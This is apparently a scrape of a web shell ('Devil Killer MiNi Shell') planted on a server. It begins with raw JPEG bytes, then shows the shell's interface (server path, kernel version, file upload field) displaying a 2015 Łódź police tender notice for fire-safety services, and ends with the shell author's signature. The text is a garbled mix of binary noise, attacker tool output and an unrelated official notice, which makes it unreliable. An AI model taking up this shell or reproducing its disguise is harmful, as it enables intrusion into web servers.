JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150619/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150619/150008-N-2015.html

<p class="kh_header"><b>Łódź: Świadczenie usług w zakresie remontów, napraw, przeglądów, konserwacji, legalizacji instalacji hydrantowych i podręcznego sprzętu gaśniczego oraz instalacji oddymiania i sygnalizacji alarmu pożaru, a także dostaw sprzętu gaśniczego, znaków ewakuacyjnych, przeciwpożarowych i instrukcji dla potrzeb Komendy Wojewódzkiej Policji  w Łodzi i jednostek jej podległych.</b><br>
<b>Numer ogłoszenia: 150008 - 2015; data zamieszczenia: 19.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Łodzi , ul. Lutomierska 108/112, 91-048 Łódź, woj. łódzkie, tel. 042 6652295, faks 042 6652080.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.lodzka.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: państwowa jednostka organizacyjna nie posiadająca osobowosi prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie remontów, napraw, przeglądów, konserwacji, legalizacji instalacji hydrantowych i podręcznego sprzętu gaśniczego oraz instalacji oddymiania i sygnalizacji alarmu pożaru, a także dostaw sprzętu gaśniczego, znaków ewakuacyjnych, przeciwpożarowych i instrukcji dla potrzeb Komendy Wojewódzkiej Policji  w Łodzi i jednostek jej podległych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
 -  świadczenie  usług  w  zakresie  remontów,  napraw,  przeglądów,  konserwacji oraz  legalizacji  instalacji   hydrantowych  i  podręcznego  sprzętu   gaśniczego;
-  świadczenie  usług  w  zakresie  remontów,  napraw,  przeglądów, konserwacji instalacji odymiania   i  sygnalizacji   alarmu   pożaru,  instalacji   oświetlenia ewakuacyjnego,  awaryjnego  drzwi  ppoż.   i przeciwpożarowych   wyłączników prądu;
 -  dostawy    sprzętu  gaśniczego,   znaków    ewakuacyjnych,    przeciwpożarowych i instrukcji dla potrzeb KWP w Łodzi i jednostek jej podległych.
Szczegółowe warunki realizacji przedmiotu zamówienia zostały określone w załącznikach nr 12 do SIWZ- wzorze umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5, 35.11.13.00-8, 34.92.84.72-7, 22.47.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część nr 2
Wykonawca ma obowiązek wykazać się posiadaniem zezwolenia Prezesa Państwowej  Agencji Atomistyki w zakresie instalowania, konserwacji, kontroli szczelności źródeł - izotopowych czujek dymu - na potrzeby ich demontażu i utylizacji określone w art. 4 ust. 1 ustawy z dnia 29 listopada 2000 r. Prawo Atomowe (Dz. U. z 2012 r. poz. 264 ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część nr 1
Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do Wykonawców, którzy należycie wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 3 usług, których przedmiotem zamówienia była usługa odpowiadająca swoim rodzajem przedmiotowi zamówienia o wartości 150 000 zł brutto każda z nich wraz z załączeniem dowodów, czy zostały wykonane należycie lub są wykonywane należycie. 
Przez usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia określonemu w szczegółowym opisie przedmiotu zamówienia Zamawiający rozumie kompleksową  usługę polegająca na remoncie, naprawie, przeglądzie, konserwacji, legalizacji instalacji hydrantowych i podręcznego sprzętu gaśniczego.

Część nr 2 
Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do Wykonawców, którzy należycie   wykonali   w  okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres   prowadzenia   działalności   jest   krótszym w tym okresie co najmniej 6 (sześć) usług polegających na serwisowaniu  lub naprawach SAP, z zastrzeżeniem, że każda z usług  dotyczy innego obiektu. Realizacja każdej z usługi trwa lub trwała minimum 12 miesięcy.
Przez usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia określonemu w szczegółowym opisie przedmiotu zamówienia Zamawiający rozumie kompleksową usługę polegającą  na remoncie, naprawie, przeglądzie, konserwacji, legalizacji instalacji oddymiania i sygnalizacji alarmu pożaru, instalacji oświetlenia ewakuacyjnego, awaryjnego drzwi ppoż. i przeciwpożarowych wyłączników prądu.

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca  w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie  realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, zgodnie  z Załącznikiem nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część nr 1
Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do Wykonawców, którzy dysponują co najmniej:
a - dwiema    osobami,    które   będą    wykonywać    zamówienie,     posiadającymi     ukończony kurs konserwatora gaśnic i
b - dwiema osobami, które będą wykonywać zamówienie,  posiadającymi szkolenie   
w   zakresie konserwacji hydrantów.
Osoby wykonujące zamówienie muszą posiadać:
1)autoryzację na naprawę i konserwację gaśnic wydaną przez producentów gaśnic znajdujących się  na wyposażeniu Zamawiającego tj. KZWM Ogniochron S.A., GZWM S.A., Boxmet Trade 
Sp. z o.o. 
2)uprawnienia do napełniania zbiorników gaśnic i agregatów gaśniczych oraz przygotowywania tych zbiorników do badań okresowych wydane przez UDT
Zamawiający informuje, że mogą to być te same osoby.

Część nr 2 
 Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do Wykonawców, którzy dysponują co najmniej:
 a - jedną    osobą,    która     będzie    wykonywać     zamówienie,      posiadającą     uprawnienia inspektora   ochrony   radiologicznej   (w  przypadku  serwisu  czujek  jonizacyjnych);
 b -  jedną   osobą,   która   będzie   wykonywać   zamówienie,   posiadającą   certyfikat  szkolenia i  konserwacji systemu Polon;
 c -  jedną   osobą,   która   będzie   wykonywać   zamówienie,   posiadającą   certyfikat  szkolenia   i  konserwacji  systemu  BOSCH  seria  central  FPA; 
 d- jedną    osobą,   która   będzie  wykonywać  zamówienie,   posiadającą   certyfikat   szkolenia    z     zakresu     projektowania,     funkcjonowania,     konfiguracji      i      montażu    systemów   oddymiania,    zamknięć   ogniowych   i    wentylacji  D + H;       
 e - jedną   osobą,   która   będzie   wykonywać   zamówienie,   posiadającą   certyfikat   szkolenia i   konserwacji      systemu     sygnalizacji      pożarowej    COOPER   i   systemu   sygnalizacji  pożarowej ARITECH.
         
 Powyższe certyfikaty powinny być wystawione przez producentów systemów SAP zgodnie  z wytycznymi PN-E-083350-14 Systemy Sygnalizacji Pożarowej.

f   - jedną  osobą  posiadającą  uprawnienia   do  eksploatacji  urządzeń  elektrycznych o napięciu  do  1 kV ,  wydane  dla  grupy  1  pkt.  2  i 10 określonej w załączeniu nr 1 do Rozporządzenia    Ministra    Gospodarki,    Pracy  i    Polityki    Społecznej   z    dnia   28.04.2004 r.   w   sprawie  szczegółowych  zasad   stwierdzenia   posiadania   kwalifikacji   przez   osoby   zajmujące  się eksploatacją   instalacji   i   sieci (Dz. U. Nr 89, poz. 828).

Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca  w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie  realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, zgodnie  z Załącznikiem nr 8 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz powinien zawierać tylko usługi na potwierdzenie spełnienia warunku, o którym mowa w pkt. 8.2 SIWZ, dla których Wykonawca powinien przedstawić dowody.
część 1 - Przez usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia określonemu w szczegółowym opisie przedmiotu zamówienia Zamawiający rozumie kompleksową  usługę polegająca na remoncie, naprawie, przeglądzie, konserwacji, legalizacji instalacji hydrantowych i podręcznego sprzętu gaśniczego.
część 2 - Przez usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia określonemu w szczegółowym opisie przedmiotu zamówienia Zamawiający rozumie kompleksową usługę polegającą  na remoncie, naprawie, przeglądzie, konserwacji, legalizacji instalacji oddymiania i sygnalizacji alarmu pożaru, instalacji oświetlenia ewakuacyjnego, awaryjnego drzwi ppoż. i przeciwpożarowych wyłączników prądu.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>/JEŻELI DOTYCZY/ w sytuacji, kiedy Wykonawca wykazując spełnienie warunków, 
o których mowa w pkt 8.2 i 8.3 SIWZ, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów składa:
1.zobowiązanie - Załącznik nr 8 do SIWZ,
2.dokument dotyczący zakresu dostępnych Wykonawcy zasobów innego podmiotu,
3.dokument dotyczący sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonywaniu zamówienia,
4.dokument dotyczący charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
5.dokument dotyczący zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany oraz ich zakres określono w załączniku nr 12 do SIWZ-wzorze umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.lodzka.policja.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji  w Łodzi
Sekcja ds. Funduszy Pomocowych i Zamówień Publicznych
ul. Lutomierska 108/112, 91-048 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2015 godzina 10:00, miejsce: Komenda Wojewódzka Policji  w Łodzi
Sekcja ds. Funduszy Pomocowych i Zamówień Publicznych
ul. Lutomierska 108/112, 91-048 Łódź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie remontów, napraw, przeglądów, konserwacji, legalizacji instalacji hydrantowych i podręcznego sprzętu gaśniczego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie remontów, napraw, przeglądów, konserwacji, legalizacji instalacji hydrantowych i podręcznego sprzętu gaśniczego.
Wykaz sprzętu przewidzianego do obsługi zawiera Załącznik nr 3 do SIWZ - wykaz sprzętu.
Usługi będą świadczone w miejscu użytkowania urządzeń. Wykaz obiektów, w których będzie świadczona usługa zawiera Załącznik nr 4 do SIWZ - wykaz obiektów.
Ilość obiektów wymagających okresowych przeglądów może ulec zmianie w trakcie trwania umowy z uwagi na realizowane modernizacje w obiektach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5, 35.11.13.00-8, 34.92.84.72-7, 22.47.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji na naprawę - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie remontów, napraw, przeglądów, konserwacji, legalizacji instalacji oddymiania i sygnalizacji alarmu pożaru, instalacji oświetlenia ewakuacyjnego, awaryjnego drzwi ppoż. i przeciwpożarowych wyłączników prądu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie remontów, napraw, przeglądów, konserwacji, legalizacji instalacji oddymiania i sygnalizacji alarmu pożaru, instalacji oświetlenia ewakuacyjnego, awaryjnego drzwi ppoż. i przeciwpożarowych wyłączników prądu.
Wykaz sprzętu przewidzianego do obsługi zawiera Załącznik nr 3 do SIWZ - wykaz sprzętu.
Usługi będą świadczone w miejscu użytkowania urządzeń. Wykaz obiektów, w których będzie świadczona usługa zawiera Załącznik nr 4 do SIWZ - wykaz obiektów.
Ilość obiektów wymagających okresowych przeglądów może ulec zmianie w trakcie trwania umowy z uwagi na realizowane modernizacje w obiektach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.41.32.00-5, 35.11.13.00-8, 34.92.84.72-7, 22.47.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas reakcji na naprawę - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem     zamówienia      jest    sukcesywna     dostawa    sprzętu   ppoż.    oraz   znaków    ewakuacyjnych,    przeciwpożarowych   i    instrukcji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem     zamówienia      jest    sukcesywna     dostawa    sprzętu   ppoż.    oraz   znaków    ewakuacyjnych,    przeciwpożarowych   i    instrukcji     według   bieżących  potrzeb    dla   KWP    w    Łodzi,    jednostek  garnizonu  łódzkiego  oraz  Zarządu  I  Centralnego  Biura   Śledczego Policji    i   Biura   Spraw   Wewnętrznych   KGP,    według   asortymentu,   ilości   i  wymagań    jakościowych            wskazanych  w   Formularzu  asortymentowo - cenowym  do  części  nr 3 - Załącznik nr 2  do SIWZ .
Ilości zamawianego  asortymentu    przedstawione    w   Formularzu  asortymentowo -cenowym   są  wielkościami  szacunkowymi   służącymi  do skalkulowania ceny oferty, mogą one  ulec zmianie w trakcie   realizacji    zamówienia,   ale  ogólna   wartość  realizowanych   dostaw nie  przekroczy     kwoty zapisanej w umowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.11.13.00-8, 34.92.84.72-7, 22.47.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin dostawy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com